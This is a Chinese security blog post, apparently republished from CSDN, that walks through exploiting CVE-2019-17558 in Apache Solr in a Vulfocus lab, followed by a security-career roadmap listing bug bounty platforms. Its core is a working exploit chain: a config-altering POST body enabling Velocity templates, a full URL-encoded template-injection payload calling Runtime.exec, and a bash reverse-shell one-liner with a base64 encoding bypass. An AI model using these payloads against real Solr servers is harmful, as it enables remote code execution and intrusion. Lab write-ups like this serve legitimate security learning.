码农知识堂 - 1000bd
  •   Python
  •   PHP
  •   JS/TS
  •   JAVA
  •   C/C++
  •   C#
  •   GO
  •   Kotlin
  •   Swift
  • 【漏洞复现-solr-命令执行】vulfocus/solr-cve_2019_17558


       

    前言:

    介绍: 

    博主:网络安全领域狂热爱好者(承诺在CSDN永久无偿分享文章)。

    殊荣:CSDN网络安全领域优质创作者,2022年双十一业务安全保卫战-某厂第一名,某厂特邀数字业务安全研究员,edusrc高白帽,vulfocus、攻防世界等平台排名100+、高校漏洞证书、cnvd原创漏洞证书等。

    擅长:对于技术、工具、漏洞原理、黑产打击的研究。

    C站缘:C站的前辈,引领我度过了一个又一个技术的瓶颈期、迷茫期。


    导读:

    面向读者:对于网络安全方面的学者。 

    本文知识点(读者自测): 

    (1)寻找模板(接口、配置文件)的命令执行漏洞(√)

     让读者如虎添翼

    命令、代码执行博文目标状态
    【漏洞复现-jupyter_notebook-命令执行】vulfocus/jupyter_notebook-cve_2019_9644发现功能点上的命令执行已发布
    【漏洞复现-solr-命令执行】vulfocus/solr-cve_2019_17558寻找模板(接口、配置文件)的命令执行漏洞已发布
    【漏洞复现-seaCms-命令执行】vulfocus/seacms-cnvd_2020_22721写入可执行文件已发布
    【漏洞复现-maccms-命令执行】vulfocus/maccms-cve_2017_17733参数中写入命令(加密)已发布
    【漏洞复现-webmin-命令执行】vulfocus/webmin-cve_2019_15107拼接执行命令已发布
    【漏洞复现-thinkphp-命令执行】vulfocus/thinkphp-3.2.x写入错误日志中已发布
    【漏洞复现-Discuz-代码执行】Discuz_CVE-2019-13956cookie中植入已发布
    【漏洞复现-骑士cms-代码执行】vulfocus/骑士cms_cve_2020_35339后台配置中植入命令已发布
    更多复现漏洞将公布,敬请期待————


    目录

    一、靶场环境

    1.1、平台:

    1.2、知识:

    1.3、描述:

    二、漏洞验证

    2.1、分析:


    一、靶场环境

    1.1、平台:

    Vulfocus 漏洞威胁分析平台

    123.58.224.8:28378

    ​

     ​

    1.2、知识:

    1、API接口信息,配置文件

    1.3、描述:

    Apache Solr 5.0.0版本至8.3.1版本中存在输入验证错误漏洞。

    攻击者可借助自定义的Velocity模板功能,利用Velocity-SSTI漏洞在Solr系统上执行任意代码。



    二、漏洞验证

    2.1、分析:

    第一步:

    访问特定url启用配置params.resource.loader.enabled,其中API路径包含core名称

    访问

    /solr/admin/cores?indexInfo=false&wt=json

    ​


    第二步:

    启用配置 params.resource.loader.enabled 为true

    在url访问/solr/demo/config,bp抓包 改成POST然后修改启动配置

    ​

    修改一:

    改为POST请求

    修改二:

    1. {
    2. "update-queryresponsewriter": {
    3. "startup": "lazy",
    4. "name": "velocity",
    5. "class": "solr.VelocityResponseWriter",
    6. "template.base.dir": "",
    7. "solr.resource.loader.enabled": "true",
    8. "params.resource.loader.enabled": "true"
    9. }
    10. }

    ​

    ​


    第三步:

    注入Velocity模板即可执行任意命令

    POC:

    /solr/demo/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27ls%20/tmp%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end

    URL中插入命令

    ​

    ​


    扩展:

    使用bash来反弹shell【但Runtime.getRuntime().exec()中不能使用管道符等bash需要的方法】

    需要进行一次base64编码绕过

    bash -i >& /dev/tcp/ip/port  0>&1

    %2CYmFzaCAtaSA%2BJiAvZGV2L3RjcC8+ip/port的base64编码+IDA%2BJjE%3D

    组合

    bash%20-c%20{echo%2CYmFzaCAtaSA%2BJiAvZGV2L3RjcC8+ip/port的base64编码+IDA%2BJjE%3D}|{base64%2C-d}|{bash%2C-i}



    网络安全三年之约

    First year 

    掌握各种原理、不断打新的靶场

    目标:edusrc、cnvd 

    主页 | 教育漏洞报告平台 (sjtu.edu.cn)https://src.sjtu.edu.cn/https://www.cnvd.org.cnhttps://www.cnvd.org.cn/


    second year 

    不断学习、提升技术运用技巧,研究各种新平台

    开始建立自己的渗透体系

    目标:众测平台、企业src应急响应中心 

    众测平台URL
    漏洞盒子漏洞盒子 | 互联网安全测试众测平台
    火线安全平台火线安全平台
    漏洞银行BUGBANK 官方网站 | 领先的网络安全漏洞发现品牌 | 开放安全的提出者与倡导者 | 创新的漏洞发现平台
    360漏洞众包响应平台360漏洞云漏洞众包响应平台
    补天平台(奇安信)补天 - 企业和白帽子共赢的漏洞响应平台,帮助企业建立SRC
    春秋云测首页
    雷神众测(可信众测,安恒)雷神众测 - BountyTeam
    云众可信(启明星辰)云众可信 - 互联网安全服务引领者
    ALLSECALLSEC
    360众测360众测平台
    看雪众测(物联网)https://ce.kanxue.com/
    CNVD众测平台网络安全众测平台
    工控互联网安全测试平台CNCERT工业互联网安全测试平台
    慢雾(区块链)Submit Bug Bounty - SlowMist Zone - Blockchain Ecosystem Security Zone
    平安汇聚http://isrc.pingan.com/homePage/index

    互联网大厂URL
    阿里https://asrc.alibaba.com/#/
    腾讯https://security.tencent.com/
    百度https://bsrc.baidu.com/v2/#/home
    美团https://security.meituan.com/#/home
    360https://security.360.cn/
    网易https://aq.163.com/
    字节跳动https://security.bytedance.com/
    京东https://security.jd.com/#/
    新浪http://sec.sina.com.cn/
    微博https://wsrc.weibo.com/
    搜狗http://sec.sogou.com/
    金山办公https://security.wps.cn/
    有赞https://src.youzan.com/


    Third Year 

    学习最新的知识,建全自己的渗透体系

    目标:参与护网(每一个男孩子心中的梦想) 

    时间:一般5月面试,6/7月开始(持续2-3周)

    分类:国家级护网、省级护网、市级护网、重大节日护网(如:建党、冬奥等)

  • 相关阅读:
    Mac安装rabbitmq延迟队列插件
    87.有效的完全平方数(力扣)
    C++11 initializer_list 轻量级初始化列表的使用场景(让自定义类可以用初始化列表的形式来实例化对象)
    Comparison method violates its general contract解决办法
    代码随想录一一一哈希表一一一有效的字母异位词
    什么是驱动?驱动程序的工作原理?
    Arcgis日常天坑问题(1)——将Revit模型转为slpk数据卡住不前
    liteos连接器脚本隐藏的指针问题
    【tesseract】Linux环境安装tesseract教程
    【HttpRunnerManager】搭建接口自动化测试平台操作流程
  • 原文地址:https://blog.csdn.net/qq_53079406/article/details/127332723
  • 最新文章
  • 攻防演习之三天拿下官网站群
    数据安全治理学习——前期安全规划和安全管理体系建设
    企业安全 | 企业内一次钓鱼演练准备过程
    内网渗透测试 | Kerberos协议及其部分攻击手法
    0day的产生 | 不懂代码的"代码审计"
    安装scrcpy-client模块av模块异常,环境问题解决方案
    leetcode hot100【LeetCode 279. 完全平方数】java实现
    OpenWrt下安装Mosquitto
    AnatoMask论文汇总
    【AI日记】24.11.01 LangChain、openai api和github copilot
  • 热门文章
  • 十款代码表白小特效 一个比一个浪漫 赶紧收藏起来吧!!!
    奉劝各位学弟学妹们,该打造你的技术影响力了!
    五年了,我在 CSDN 的两个一百万。
    Java俄罗斯方块,老程序员花了一个周末,连接中学年代!
    面试官都震惊,你这网络基础可以啊!
    你真的会用百度吗?我不信 — 那些不为人知的搜索引擎语法
    心情不好的时候,用 Python 画棵樱花树送给自己吧
    通宵一晚做出来的一款类似CS的第一人称射击游戏Demo!原来做游戏也不是很难,连憨憨学妹都学会了!
    13 万字 C 语言从入门到精通保姆级教程2021 年版
    10行代码集2000张美女图,Python爬虫120例,再上征途
Copyright © 2022 侵权请联系2656653265@qq.com    京ICP备2022015340号-1
正则表达式工具 cron表达式工具 密码生成工具

京公网安备 11010502049817号